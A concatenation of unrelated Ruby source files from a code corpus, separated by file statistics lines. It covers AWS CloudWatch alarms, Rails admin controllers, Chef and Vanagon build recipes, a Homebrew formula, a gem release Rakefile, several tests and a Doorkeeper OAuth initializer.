:dimensions,
:period,
:unit,
:evaluation_periods,
:threshold,
:comparison_operator,
:alarm_names
].each { |option| attr_reader option }
attr_reader :client
attr_reader :options
def initialize(config)
@client = ::Aws::CloudWatch::Client.new
OPTIONS.each do |option|
if config.has_key?(option)
instance_variable_set("@#{option}", config[option])
end
end
end
def options
options = {}
OPTIONS.each do |option|
value = self.send(option)
options[option] = value unless value.nil?
end
options
end
def put_metric_alarm
self.client.put_metric_alarm options
end
def delete_alarms
self.client.delete_alarms options
end
end
end
end
end
| 22.683333 | 65 | 0.495959 |
6299fabf383ede56a1fa8bce58d40b29ef3f7146 | 494 | # encoding: utf-8
require 'spec/expectations'
$:.unshift(File.dirname(__FILE__) + '/../../lib') # This line is not needed in your own project
require 'cucumber/formatter/unicode'
require 'calculadora'
Before do
@calc = Calculadora.new
end
After do
end
Given /que eu digitei (\d+) na calculadora/ do |n|
@calc.push n.to_i
end
When 'eu aperto o botão de soma' do
@result = @calc.soma
end
Then /o resultado na calculadora deve ser (\d*)/ do |result|
@result.should == result.to_i
end
| 19.76 | 95 | 0.704453 |
ab95eaa6448d9a2f6cc9523a022f4c5983ab4b81 | 1,232 | module Admin
class PermissionsController < ::AdminController
before_action :find_employee, only: %i[update destroy]
before_action :valid_employee
def update
@employee.update(role: :manager)
@employees = current_company.employees.active.order(role: :desc, name: :asc)
respond_to do |format|
format.turbo_stream do
render turbo_stream: turbo_stream.update('employees-list', partial: "admin/employees/employee", collection: @employees)
end
format.html { redirect_to admin_employees_url }
end
end
def destroy
@employee.update(role: :employee)
@employees = current_company.employees.active.order(role: :desc, name: :asc)
respond_to do |format|
format.turbo_stream do
render turbo_stream: turbo_stream.update('employees-list', partial: "admin/employees/employee", collection: @employees)
end
format.html { redirect_to admin_employees_url }
end
end
private
def find_employee
@employee = current_company.employees.find(params[:employee_id])
end
def valid_employee
redirect_to admin_employees_url and return false if @employee.administration?
end
end
end
| 28 | 129 | 0.691558 |
26c8a73c09adaed89cd7aa30bb9abb717c8dcf09 | 1,068 | module GamesAdmin
class GamesController < ApplicationController
before_action :set_game, only: [:show, :edit, :update, :destroy]
def index
@games = AppComponent::Game.all
end
def show
end
def new
@game = AppComponent::Game.new
end
def edit
end
def create
@game = AppComponent::Game.new(game_params)
if @game.save
redirect_to @game, notice: 'Game was successfully created.'
else
render :new
end
end
def update
if @game.update(game_params)
redirect_to @game, notice: 'Game was successfully updated.'
else
render :edit
end
end
def destroy
@game.destroy
redirect_to games_url, notice: 'Game was successfully destroyed.'
end
private
def set_game
@game = AppComponent::Game.find(params[:id])
end
def game_params
params.require(:game).permit(:date, :location, :first_team_id, :second_team_id, :winning_team, :first_team_score, :second_team_score)
end
end
end
| 20.538462 | 141 | 0.626404 |
0358fbaa047c773b0c656f295168aa2fe78132ca | 3,488 | component "rubygem-ffi" do |pkg, settings, platform|
pkg.version '1.9.25'
pkg.md5sum "e8923807b970643d9e356a65038769ac"
instance_eval File.read('configs/components/_base-rubygem.rb')
# Windows versions of the FFI gem have custom filenames, so we overwite the
# defaults that _base-rubygem provides here, just for Windows.
if platform.is_windows?
# Vanagon's `pkg.mirror` is additive, and the _base_rubygem sets the
# non-Windows gem as the first mirror, which is incorrect. We need to unset
# the list of mirrors before adding the Windows-appropriate ones here:
@component.mirrors = []
# Same for install steps:
@component.install = []
if platform.architecture == "x64"
pkg.md5sum "e263997763271fba35562245b450576f"
pkg.url "https://rubygems.org/downloads/ffi-#{pkg.get_version}-x64-mingw32.gem"
pkg.mirror "#{settings[:buildsources_url]}/ffi-#{pkg.get_version}-x64-mingw32.gem"
else
pkg.md5sum "3303124f1ca0ee3e59829301ffcad886"
pkg.url "https://rubygems.org/downloads/ffi-#{pkg.get_version}-x86-mingw32.gem"
pkg.mirror "#{settings[:buildsources_url]}/ffi-#{pkg.get_version}-x86-mingw32.gem"
end
pkg.install do
"#{settings[:gem_install]} ffi-#{pkg.get_version}-#{platform.architecture}-mingw32.gem"
end
end
if platform.is_solaris?
base_ruby = case platform.os_version
when "10"
"/opt/csw/lib/ruby/2.0.0"
when "11"
"/opt/pl-build-tools/lib/ruby/2.1.0"
end
ffi_lib_version = case platform.os_version
when "10"
"6.0.4"
when "11"
"5.0.10"
end
pkg.environment "PATH", "/opt/pl-build-tools/bin:/opt/csw/bin:$$PATH"
case platform.os_version
when "10"
pkg.install_file "/opt/csw/lib/libffi.so.#{ffi_lib_version}", "#{settings[:libdir]}/libffi.so.6"
when "11"
pkg.environment "CPATH", "/opt/csw/lib/libffi-3.2.1/include"
pkg.environment "MAKE", platform[:make]
if platform.is_cross_compiled?
# install libffi.so from pl-build-tools
pkg.install_file "#{settings[:tools_root]}/#{settings[:platform_triple]}/sysroot/usr/lib/libffi.so.#{ffi_lib_version}", "#{settings[:libdir]}/libffi.so"
# monkey-patch rubygems to think we're running on the destination ruby and architecture
ruby_api_version = settings[:ruby_version].gsub(/\.\d*$/, '.0')
pkg.build do
[
%(#{platform[:sed]} -i 's/Gem::Platform.local.to_s/&.gsub("x86", "#{platform.architecture}")/g' #{base_ruby}/rubygems/basic_specification.rb),
%(#{platform[:sed]} -i 's/Gem.extension_api_version/"#{ruby_api_version}"/g' #{base_ruby}/rubygems/basic_specification.rb)
]
end
else
# install system libffi.so if we're not cross compiling
pkg.install_file "/usr/lib/libffi.so.#{ffi_lib_version}", "#{settings[:libdir]}/libffi.so"
end
end
if platform.is_cross_compiled?
# monkey-patch rubygems to require our custom rbconfig when
# building gems with native extensions
sed_command = %(s|Gem.ruby|&, '-r/opt/puppetlabs/puppet/share/doc/rbconfig-#{settings[:ruby_version]}-orig.rb'|)
pkg.build do
[
%(#{platform[:sed]} -i "#{sed_command}" #{base_ruby}/rubygems/ext/ext_conf_builder.rb)
]
end
end
end
end
| 40.55814 | 160 | 0.635608 |
08ef5b7f11035209fd1e6a276ec0c1d4d246a88d | 3,331 | #
# Cookbook:: ruby_rbenv
# Provider:: ruby
#
# Author:: Fletcher Nichol <[email protected]>
#
# Copyright:: 2011-2017, Fletcher Nichol
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
use_inline_resources
provides :rbenv_ruby
include Chef::Rbenv::ScriptHelpers
def load_current_resource
@rubie = new_resource.definition
@definition_file = new_resource.definition_file
@root_path = new_resource.root_path
@user = new_resource.user
@environment = new_resource.environment
@patch_url = new_resource.patch_url
@patch_file = new_resource.patch_file
@rbenv_action = new_resource.rbenv_action
end
action :install do # ~FC017
perform_install
end
action :reinstall do # ~FC017
perform_install
end
private
def perform_install
if ruby_build_missing?
Chef::Log.warn(
'ruby_build cookbook is missing. Please add to the run_list (Action will be skipped).')
elsif ruby_installed?
Chef::Log.debug("#{new_resource} is already installed - nothing to do")
else
install_start = Time.now
install_ruby_dependencies
Chef::Log.info("Building #{new_resource}, this could take a while...")
# bypass block scoping issues
rbenv_user = @user
rubie = @rubie
definition = @definition_file || rubie
rbenv_prefix = @root_path
rbenv_env = @environment
patch_command = nil
patch_command = "--patch < <(curl -sSL #{@patch_url})" if @patch_url
patch_command = "--patch < #{@patch_file}" if @patch_file
command = %(rbenv #{@rbenv_action} #{definition} #{patch_command})
rbenv_script "#{command} #{which_rbenv}" do
code command
user rbenv_user if rbenv_user
root_path rbenv_prefix if rbenv_prefix
environment rbenv_env if rbenv_env
action :nothing
end.run_action(:run)
Chef::Log.debug("#{new_resource} build time was " \
"#{(Time.now - install_start) / 60.0} minutes")
end
end
def ruby_installed?
if Array(new_resource.action).include?(:reinstall)
false
else
::File.directory?(::File.join(rbenv_root, 'versions', @rubie))
end
end
def ruby_build_missing?
!run_context.loaded_recipe?('ruby_build')
end
def install_ruby_dependencies
definition = ::File.basename(new_resource.definition)
case definition
when /^\d\.\d\.\d/, /^rbx-/, /^ree-/
pkgs = node['ruby_build']['install_pkgs_cruby']
when /^jruby-/
pkgs = node['ruby_build']['install_pkgs_jruby']
end
pkgs.each do |pkg|
package pkg do
action :nothing
end.run_action(:install)
end
ensure_java_environment if definition =~ /^jruby-/
end
def ensure_java_environment
resource_collection.find(
'ruby_block[update-java-alternatives]'
).run_action(:create)
rescue Chef::Exceptions::ResourceNotFound
# have pity on my soul
Chef::Log.info 'The java cookbook does not appear to in the run_list.'
end
| 26.436508 | 93 | 0.720805 |
e2c8a801301a362f14b2471ba4c8316bbf20bec6 | 1,606 | test_name 'C3436 - checkout a branch (git protocol)'
# Globals
repo_name = 'testrepo_branch_checkout'
branch = 'a_branch'
hosts.each do |host|
tmpdir = host.tmpdir('vcsrepo')
step 'setup - create repo' do
git_pkg = 'git'
if host['platform'] =~ %r{ubuntu-10}
git_pkg = 'git-core'
end
install_package(host, git_pkg)
my_root = File.expand_path(File.join(File.dirname(__FILE__), '../../../..'))
scp_to(host, "#{my_root}/acceptance/files/create_git_repo.sh", tmpdir)
on(host, "cd #{tmpdir} && ./create_git_repo.sh")
end
step 'setup - start git daemon' do
install_package(host, 'git-daemon') unless host['platform'] =~ %r{debian|ubuntu}
on(host, "git daemon --base-path=#{tmpdir} --export-all --reuseaddr --verbose --detach")
end
teardown do
on(host, "rm -fr #{tmpdir}")
on(host, 'pkill -9 git-daemon ; sleep 1')
end
step 'checkout a branch with puppet' do
pp = <<-MANIFEST
vcsrepo { "#{tmpdir}/#{repo_name}":
ensure => present,
source => "git://#{host}/testrepo.git",
provider => git,
revision => '#{branch}',
}
MANIFEST
apply_manifest_on(host, pp, catch_failures: true)
apply_manifest_on(host, pp, catch_changes: true)
end
step "verify checkout is on the #{branch} branch" do
on(host, "ls #{tmpdir}/#{repo_name}/.git/") do |res|
fail_test('checkout not found') unless res.stdout.include? 'HEAD'
end
on(host, "cat #{tmpdir}/#{repo_name}/.git/HEAD") do |res|
fail_test('branch not found') unless res.stdout.include? "ref: refs/heads/#{branch}"
end
end
end
| 30.301887 | 93 | 0.634496 |
d559e1de48341f6c1b9565aab2a0a4a7ab82ee5f | 479 | cask 'bunq' do
version '0.8.11'
sha256 'ff461b377e5b6acd9bffd86e2c8367eb3ec2e1e6734c8a64f58ef4b8aed3eb05'
# github.com/BunqCommunity/BunqDesktop was verified as official when first introduced to the cask
url "https://github.com/BunqCommunity/BunqDesktop/releases/download/#{version}/BunqDesktop-#{version}.dmg"
appcast 'https://github.com/BunqCommunity/BunqDesktop/releases.atom'
name 'BunqDesktop'
homepage 'https://bunqdesktop.com/'
app 'BunqDesktop.app'
end
| 36.846154 | 108 | 0.787056 |
0393bfb07a851614389bf3f1d7f150582274cf12 | 1,902 | require 'spec_helper'
describe Admin::Merchandise::Multi::VariantsController do
render_views
before(:each) do
activate_authlogic
@user = create_admin_user
login_as(@user)
end
it "edit action should render edit template" do
@product = FactoryGirl.create(:product)
get :edit, product_id: @product.id
expect(response).to render_template(:edit)
end
it "update action should render edit template when model is invalid" do
@product = FactoryGirl.create(:product)
Product.any_instance.stubs(:valid?).returns(false)
put :update, product_id: @product.id, product: product_attributes
expect(response).to render_template(:edit)
end
it "update action should redirect when model is valid" do
@product = FactoryGirl.create(:product)
#Product.any_instance.stubs(:valid?).returns(true)
#Variant.any_instance.stubs(:valid?).returns(true)
put :update, product_id: @product.id, product: product_attributes
@product.reload
expect(response).to redirect_to(admin_merchandise_product_url(@product))
expect(@product.variants.first.variant_properties.count).to eq 2
expect(@product.variants.first.variant_properties.map(&:description)).to include 'Red'
expect(@product.variants.first.variant_properties.map(&:description)).to include 'Small'
end
def product_attributes
{"variants_attributes" => {
"new_variants" => {"sku"=>"0000-0000-000001", "price"=>"30.0", "cost"=>"10.0", "name"=>"", "inactivate"=>"0",
"variant_properties_attributes" => {"0" => {"primary"=>"1", "property_id"=>"1", "description"=>"Red", "id"=>""},
"1" => {"primary"=>"0", "property_id"=>"2", "description"=>"Small", "id"=>""},
"2" => {"primary"=>"0", "property_id"=>"3", "description"=>""}} }
}}
end
end
| 40.468085 | 125 | 0.644585 |
21609933d2f9678b0c0a8536b9f00377b1aa75ad | 723 | begin
require_relative 'helper'
rescue LoadError
end
class TestFiddle < Fiddle::TestCase
def test_constants_match
[
:TYPE_VOID,
:TYPE_VOIDP,
:TYPE_CHAR,
:TYPE_SHORT,
:TYPE_INT,
:TYPE_LONG,
:TYPE_LONG_LONG,
:TYPE_FLOAT,
:TYPE_DOUBLE,
].each do |name|
assert_equal(DL.const_get(name), Fiddle.const_get(name))
end
end
def test_windows_constant
require 'rbconfig'
if RbConfig::CONFIG['host_os'] =~ /mswin|mingw/
assert Fiddle::WINDOWS, "Fiddle::WINDOWS should be 'true' on Windows platforms"
else
refute Fiddle::WINDOWS, "Fiddle::WINDOWS should be 'false' on non-Windows platforms"
end
end
end if defined?(Fiddle)
| 21.909091 | 90 | 0.659751 |
6af41b21e2d733a3a7440bdd9a79da6ef7c78ab6 | 211 | class AddSpecialTypeToSubmission < ActiveRecord::Migration[4.2]
def self.up
add_column :submissions, :special_type, :integer
end
def self.down
remove_columnn :submissions, :special_type
end
end
| 21.1 | 63 | 0.758294 |
bb4c061d09515530e10bf31059fdcdcb511e9ad3 | 424 | class RemoveMandatoryOfResumeUrlAddFeedbackFromApplications < ActiveRecord::Migration[5.0]
#add_feedback_from_applications
def self.up
change_column_null :my_applications, :cv_url, true
add_column :my_applications, :overall_feedback, :text, null: true, default: ''
end
def self.down
remove_column :my_applications, :overall_feedback
change_column_null :my_applications, :cv_url, false, ''
end
end
| 32.615385 | 90 | 0.78066 |
d5ad201cd4f78b4268f277e3d2daf18ce1f383d7 | 3,479 | # encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::Network::Mgmt::V2019_08_01
module Models
#
# Trusted Root certificates of an application gateway.
#
class ApplicationGatewayTrustedRootCertificate < SubResource
include MsRestAzure
# @return [String] Certificate public data.
attr_accessor :data
# @return [String] Secret Id of (base-64 encoded unencrypted pfx)
# 'Secret' or 'Certificate' object stored in KeyVault.
attr_accessor :key_vault_secret_id
# @return [ProvisioningState] The provisioning state of the trusted root
# certificate resource. Possible values include: 'Succeeded', 'Updating',
# 'Deleting', 'Failed'
attr_accessor :provisioning_state
# @return [String] Name of the trusted root certificate that is unique
# within an Application Gateway.
attr_accessor :name
# @return [String] A unique read-only string that changes whenever the
# resource is updated.
attr_accessor :etag
# @return [String] Type of the resource.
attr_accessor :type
#
# Mapper for ApplicationGatewayTrustedRootCertificate class as Ruby Hash.
# This will be used for serialization/deserialization.
#
def self.mapper()
{
client_side_validation: true,
required: false,
serialized_name: 'ApplicationGatewayTrustedRootCertificate',
type: {
name: 'Composite',
class_name: 'ApplicationGatewayTrustedRootCertificate',
model_properties: {
id: {
client_side_validation: true,
required: false,
serialized_name: 'id',
type: {
name: 'String'
}
},
data: {
client_side_validation: true,
required: false,
serialized_name: 'properties.data',
type: {
name: 'String'
}
},
key_vault_secret_id: {
client_side_validation: true,
required: false,
serialized_name: 'properties.keyVaultSecretId',
type: {
name: 'String'
}
},
provisioning_state: {
client_side_validation: true,
required: false,
serialized_name: 'properties.provisioningState',
type: {
name: 'String'
}
},
name: {
client_side_validation: true,
required: false,
serialized_name: 'name',
type: {
name: 'String'
}
},
etag: {
client_side_validation: true,
required: false,
serialized_name: 'etag',
type: {
name: 'String'
}
},
type: {
client_side_validation: true,
required: false,
serialized_name: 'type',
type: {
name: 'String'
}
}
}
}
}
end
end
end
end
| 30.252174 | 79 | 0.511066 |
ac317390bcb290c03f310243540feb9dd589b052 | 137 | require "rubygems_test_repo_3fd2/version"
module RubygemsTestRepo3fd2
class Error < StandardError; end
# Your code goes here...
end
| 19.571429 | 41 | 0.788321 |
e84ac2f57d9eb051d3a0c52f99c3f2e950f9f87f | 2,198 | class CollectorSidecar < Formula
desc "Manage log collectors through Graylog"
homepage "https://github.com/Graylog2/collector-sidecar"
url "https://github.com/Graylog2/collector-sidecar/archive/1.0.2.tar.gz"
sha256 "ee7ddb725d3475656df0bb08476e64c7f919acfc011a338b4532249363778130"
bottle do
cellar :any_skip_relocation
sha256 "a246ba4b742f4813ea11488b1b958806d0852af192381b686326d28339651014" => :catalina
sha256 "c5df7e3fe89d27da283cba2d44c8d9bfd4edd686167b8d4acf0c6f0387154fef" => :mojave
sha256 "267c985605ca057bff286bc111fc6ac84dfc0d4bb391da19c044ddef381c7a74" => :high_sierra
sha256 "6e09f805d30b96d2650a6541fddbda8a55d6ef74d7de7e96c642df5d2cd7d18b" => :sierra
sha256 "d3992dcaef26a9cbfaa9f8433cd8a17c854b1de2b9a23273e36ebc4910ad9d39" => :x86_64_linux
end
depends_on "glide" => :build
depends_on "go" => :build
depends_on "mercurial" => :build
depends_on "filebeat"
def install
ENV["GOPATH"] = buildpath
ENV["GLIDE_HOME"] = HOMEBREW_CACHE/"glide_home/#{name}"
(buildpath/"src/github.com/Graylog2/collector-sidecar").install buildpath.children
cd "src/github.com/Graylog2/collector-sidecar" do
inreplace "main.go", "/etc", etc
inreplace "sidecar-example.yml" do |s|
s.gsub! "/usr", HOMEBREW_PREFIX
s.gsub! "/etc", etc
s.gsub! "/var", var
end
system "glide", "install"
system "make", "build"
(etc/"graylog/sidecar/sidecar.yml").install "sidecar-example.yml"
bin.install "graylog-sidecar"
prefix.install_metafiles
end
end
plist_options :manual => "graylog-sidecar"
def plist
<<~EOS
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN"
"http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Label</key>
<string>#{plist_name}</string>
<key>Program</key>
<string>#{opt_bin}/graylog-sidecar</string>
<key>RunAtLoad</key>
<true/>
</dict>
</plist>
EOS
end
test do
assert_match version.to_s, shell_output("#{bin}/graylog-sidecar -version")
end
end
| 32.80597 | 94 | 0.685623 |
18a806c64487da150e69eed6e77d82fcb9e08d62 | 278 | require 'rails'
require 'jbuilder'
require "shp_api/version"
require "shp_api/rescue_from"
require "shp_api/json_responder"
module ShpApi
def self.root
File.expand_path('../..', __FILE__)
end
def self.view_path
File.join(root, 'app', 'views')
end
end
| 14.631579 | 39 | 0.690647 |
3323785494916f8d3bf930d227d77c17c6c14f8d | 3,160 | # frozen_string_literal: true
require "test_helper"
class ActionCable::Connection::SubscriptionsTest < ActionCable::TestCase
class Connection < ActionCable::Connection::Base
attr_reader :websocket
def send_async(method, *args)
send method, *args
end
end
class ChatChannel < ActionCable::Channel::Base
attr_reader :room, :lines
def subscribed
@room = Room.new params[:id]
@lines = []
end
def speak(data)
@lines << data
end
end
setup do
@server = TestServer.new
@chat_identifier = ActiveSupport::JSON.encode(id: 1, channel: "ActionCable::Connection::SubscriptionsTest::ChatChannel")
end
test "subscribe command" do
run_in_eventmachine do
setup_connection
channel = subscribe_to_chat_channel
assert_kind_of ChatChannel, channel
assert_equal 1, channel.room.id
end
end
test "subscribe command without an identifier" do
run_in_eventmachine do
setup_connection
@subscriptions.execute_command "command" => "subscribe"
assert_empty @subscriptions.identifiers
end
end
test "unsubscribe command" do
run_in_eventmachine do
setup_connection
subscribe_to_chat_channel
channel = subscribe_to_chat_channel
channel.expects(:unsubscribe_from_channel)
@subscriptions.execute_command "command" => "unsubscribe", "identifier" => @chat_identifier
assert_empty @subscriptions.identifiers
end
end
test "unsubscribe command without an identifier" do
run_in_eventmachine do
setup_connection
@subscriptions.execute_command "command" => "unsubscribe"
assert_empty @subscriptions.identifiers
end
end
test "message command" do
run_in_eventmachine do
setup_connection
channel = subscribe_to_chat_channel
data = { "content" => "Hello World!", "action" => "speak" }
@subscriptions.execute_command "command" => "message", "identifier" => @chat_identifier, "data" => ActiveSupport::JSON.encode(data)
assert_equal [ data ], channel.lines
end
end
test "unsubscribe from all" do
run_in_eventmachine do
setup_connection
channel1 = subscribe_to_chat_channel
channel2_id = ActiveSupport::JSON.encode(id: 2, channel: "ActionCable::Connection::SubscriptionsTest::ChatChannel")
channel2 = subscribe_to_chat_channel(channel2_id)
channel1.expects(:unsubscribe_from_channel)
channel2.expects(:unsubscribe_from_channel)
@subscriptions.unsubscribe_from_all
end
end
private
def subscribe_to_chat_channel(identifier = @chat_identifier)
@subscriptions.execute_command "command" => "subscribe", "identifier" => identifier
assert_equal identifier, @subscriptions.identifiers.last
@subscriptions.send :find, "identifier" => identifier
end
def setup_connection
env = Rack::MockRequest.env_for "/test", "HTTP_HOST" => "localhost", "HTTP_CONNECTION" => "upgrade", "HTTP_UPGRADE" => "websocket"
@connection = Connection.new(@server, env)
@subscriptions = ActionCable::Connection::Subscriptions.new(@connection)
end
end
| 27.008547 | 137 | 0.709177 |
01c3936f40907252dc6e52eb057780b277510669 | 125 | json.extract! comment, :id, :user, :post_id, :content, :created_at, :updated_at
json.url comment_url(comment, format: :json)
| 41.666667 | 79 | 0.744 |
0159ceaf4effddef6432b0a44573d9f03266d8bb | 4,994 | ## Releasing a new version of octofacts
##
## 1. Update `.version` with new version number
## 2. Run `script/bootstrap` to update Gemfile.lock
## 3. Commit changes, PR, and merge to master
## 4. Check out master branch locally
## 5. Run `bundle exec rake gem:release`
require "fileutils"
require "open3"
require "shellwords"
module Octofacts
# A class to contain methods and constants for cleaner code
class Gem
BASEDIR = File.expand_path("..", File.dirname(__FILE__)).freeze
GEMS = ["octofacts", "octofacts-updater"].freeze
PKGDIR = File.join(BASEDIR, "pkg").freeze
# Verify that Gemfile.lock matches .version and that it's committed, since `bundle exec ...` will
# update the file for us.
def self.verify_gemfile_version!
bundler = Bundler::LockfileParser.new(Bundler.read_file(File.expand_path("../Gemfile.lock", File.dirname(__FILE__))))
gems = bundler.specs.select { |specs| GEMS.include?(specs.name) }
GEMS.each do |gem|
this_gem = gems.detect { |g| g.name == gem }
unless this_gem
raise "Did not find #{gem} in Gemfile.lock"
end
unless this_gem.version.to_s == version
raise "Gem #{gem} is version #{this_gem.version}, not #{version}"
end
end
puts "Ensuring that all changes are committed."
exec_command("git diff-index --quiet HEAD --")
puts "OK: All gems on #{version} and no uncommitted changes here."
end
# Read the version number from the .version file in the root of the project.
def self.version
@version ||= File.read(File.expand_path("../.version", File.dirname(__FILE__))).strip
end
# Determine what branch we are on
def self.branch
exec_command("git rev-parse --abbrev-ref HEAD").strip
end
# Build the gem and put it into the 'pkg' directory
def self.build
Dir.mkdir PKGDIR unless File.directory?(PKGDIR)
GEMS.each do |gem|
begin
output_file = File.join(BASEDIR, "#{gem}-#{version}.gem")
target_file = File.join(PKGDIR, "#{gem}-#{version}.gem")
exec_command("gem build #{gem}.gemspec")
unless File.file?(output_file)
raise "gem #{gem} failed to create expected output file"
end
FileUtils.mv output_file, target_file
puts "Generated #{target_file}"
ensure
# Clean up the *.gem generated in the main directory if it's still there
FileUtils.rm(output_file) if File.file?(output_file)
end
end
end
# Push the gem to rubygems
def self.push
GEMS.each do |gem|
target_file = File.join(PKGDIR, "#{gem}-#{version}.gem")
unless File.file?(target_file)
raise "Cannot push: #{target_file} does not exist"
end
end
GEMS.each do |gem|
target_file = File.join(PKGDIR, "#{gem}-#{version}.gem")
exec_command("gem push #{Shellwords.escape(target_file)}")
end
end
# Tag the release on GitHub
def self.tag
# Make sure we have not released this version before
exec_command("git fetch -t origin")
tags = exec_command("git tag -l").split(/\n/)
raise "There is already a #{version} tag" if tags.include?(version)
# Tag it
exec_command("git tag #{Shellwords.escape(version)}")
exec_command("git push origin master")
exec_command("git push origin #{Shellwords.escape(version)}")
end
# Yank gem from rubygems
def self.yank
GEMS.each do |gem|
exec_command("gem yank #{gem} -v #{Shellwords.escape(version)}")
end
end
# Utility method: Execute command
def self.exec_command(command)
STDERR.puts "Command: #{command}"
output, code = Open3.capture2e(command, chdir: BASEDIR)
return output if code.exitstatus.zero?
STDERR.puts "Output:\n#{output}"
STDERR.puts "Exit code: #{code.exitstatus}"
exit code.exitstatus
end
end
end
namespace :gem do
task "build" do
branch = Octofacts::Gem.branch
unless branch == "master"
raise "On a non-master branch #{branch}; use gem:force-build if you really want to do this"
end
Octofacts::Gem.build
end
task "check" do
Octofacts::Gem.verify_gemfile_version!
end
task "force-build" do
branch = Octofacts::Gem.branch
unless branch == "master"
warn "WARNING: Force-building from non-master branch #{branch}"
end
Octofacts::Gem.build
end
task "push" do
Octofacts::Gem.push
end
task "release" do
branch = Octofacts::Gem.branch
unless branch == "master"
raise "On a non-master branch #{branch}; refusing to release"
end
[:check, :build, :tag, :push].each { |t| Rake::Task["gem:#{t}"].invoke }
end
task "tag" do
branch = Octofacts::Gem.branch
raise "On a non-master branch #{branch}; refusing to tag" unless branch == "master"
Octofacts::Gem.tag
end
task "yank" do
Octofacts::Gem.yank
end
end
| 31.408805 | 123 | 0.639167 |
4a0cea39e888454e9def786c4e4a2a9e12eaa5e9 | 1,336 | require "spec_helper"
p __FILE__
describe "Parsing the generic URL 'tcp://fbeausoleil:[email protected]:3391/def'" do
def url
@url ||= UrlParser.parse("tcp://fbeausoleil:[email protected]/def")
end
it "should recognize the 'tcp' scheme" do
url.scheme.must_equal "tcp"
end
it "should recognize the 'fbeausoleil' user" do
url.user.must_equal "fbeausoleil"
end
it "should recognize the 'thepassword' thepassword" do
url.password.must_equal "thepassword"
end
it "should recognize the 'c.com' hostname" do
url.host.must_equal "c.com"
end
it "should recognize the '3391' port" do
url.port.must_equal 3391
end
it "should recognize the '/def' path" do
url.path.must_equal "/def"
end
end
describe "Parsing the generic URL 'udp://127.0.0.1:1234'" do
def url
@url ||= UrlParser.parse("udp://127.0.0.1:1234")
end
it "should recognize the 'udp' scheme" do
url.scheme.must_equal "udp"
end
it "should NOT recognize a user" do
url.user.must_be_nil
end
it "should NOT recognize a password" do
url.password.must_be_nil
end
it "should recognize a numerical host" do
url.host.must_equal "127.0.0.1"
end
it "should recognize a port" do
url.port.must_equal 1234
end
it "should NOT recognize a path" do
url.path.must_be_nil
end
end
| 20.875 | 84 | 0.689371 |
398f94b0d42995289ad5050dd4882a0ad51c3122 | 2,543 | # encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::CognitiveServices::Customvisiontraining::V2_0
module Models
#
# Model object.
#
#
class ImageRegionCreateEntry
include MsRestAzure
# @return
attr_accessor :image_id
# @return
attr_accessor :tag_id
# @return [Float]
attr_accessor :left
# @return [Float]
attr_accessor :top
# @return [Float]
attr_accessor :width
# @return [Float]
attr_accessor :height
#
# Mapper for ImageRegionCreateEntry class as Ruby Hash.
# This will be used for serialization/deserialization.
#
def self.mapper()
{
client_side_validation: true,
required: false,
serialized_name: 'ImageRegionCreateEntry',
type: {
name: 'Composite',
class_name: 'ImageRegionCreateEntry',
model_properties: {
image_id: {
client_side_validation: true,
required: false,
serialized_name: 'imageId',
type: {
name: 'String'
}
},
tag_id: {
client_side_validation: true,
required: false,
serialized_name: 'tagId',
type: {
name: 'String'
}
},
left: {
client_side_validation: true,
required: false,
serialized_name: 'left',
type: {
name: 'Double'
}
},
top: {
client_side_validation: true,
required: false,
serialized_name: 'top',
type: {
name: 'Double'
}
},
width: {
client_side_validation: true,
required: false,
serialized_name: 'width',
type: {
name: 'Double'
}
},
height: {
client_side_validation: true,
required: false,
serialized_name: 'height',
type: {
name: 'Double'
}
}
}
}
}
end
end
end
end
| 24.68932 | 70 | 0.447503 |
2124b53de1aa0c0e2c1b0da9c7ed59b0864262c8 | 20,465 | # frozen_string_literal: true
Doorkeeper.configure do
# Change the ORM that doorkeeper will use (requires ORM extensions installed).
# Check the list of supported ORMs here: https://github.com/doorkeeper-gem/doorkeeper#orms
orm :active_record
# This block will be called to check whether the resource owner is authenticated or not.
resource_owner_authenticator do
current_user || warden.authenticate!(scope: :user)
end
resource_owner_from_credentials do |routes|
request.params[:user] = {email: request.params[:username], password: request.params[:password]}
request.env['warden'].logout(:user)
request.env['devise.allow_params_authentication'] = true
request.env['warden'].authenticate!(scope: :user, store: false)
end
admin_authenticator do
if current_user
head :forbidden unless current_user.usa_admin?
else
redirect_to root_url
end
end
# You can use your own model classes if you need to extend (or even override) default
# Doorkeeper models such as `Application`, `AccessToken` and `AccessGrant.
#
# Be default Doorkeeper ActiveRecord ORM uses it's own classes:
#
# access_token_class "Doorkeeper::AccessToken"
# access_grant_class "Doorkeeper::AccessGrant"
# application_class "Doorkeeper::Application"
#
# Don't forget to include Doorkeeper ORM mixins into your custom models:
#
# * ::Doorkeeper::Orm::ActiveRecord::Mixins::AccessToken - for access token
# * ::Doorkeeper::Orm::ActiveRecord::Mixins::AccessGrant - for access grant
# * ::Doorkeeper::Orm::ActiveRecord::Mixins::Application - for application (OAuth2 clients)
#
# For example:
#
# access_token_class "MyAccessToken"
#
# class MyAccessToken < ApplicationRecord
# include ::Doorkeeper::Orm::ActiveRecord::Mixins::AccessToken
#
# self.table_name = "hey_i_wanna_my_name"
#
# def destroy_me!
# destroy
# end
# end
# Enables polymorphic Resource Owner association for Access Tokens and Access Grants.
# By default this option is disabled.
#
# Make sure you properly setup you database and have all the required columns (run
# `bundle exec rails generate doorkeeper:enable_polymorphic_resource_owner` and execute Rails
# migrations).
#
# If this option enabled, Doorkeeper will store not only Resource Owner primary key
# value, but also it's type (class name). See "Polymorphic Associations" section of
# Rails guides: https://guides.rubyonrails.org/association_basics.html#polymorphic-associations
#
# [NOTE] If you apply this option on already existing project don't forget to manually
# update `resource_owner_type` column in the database and fix migration template as it will
# set NOT NULL constraint for Access Grants table.
#
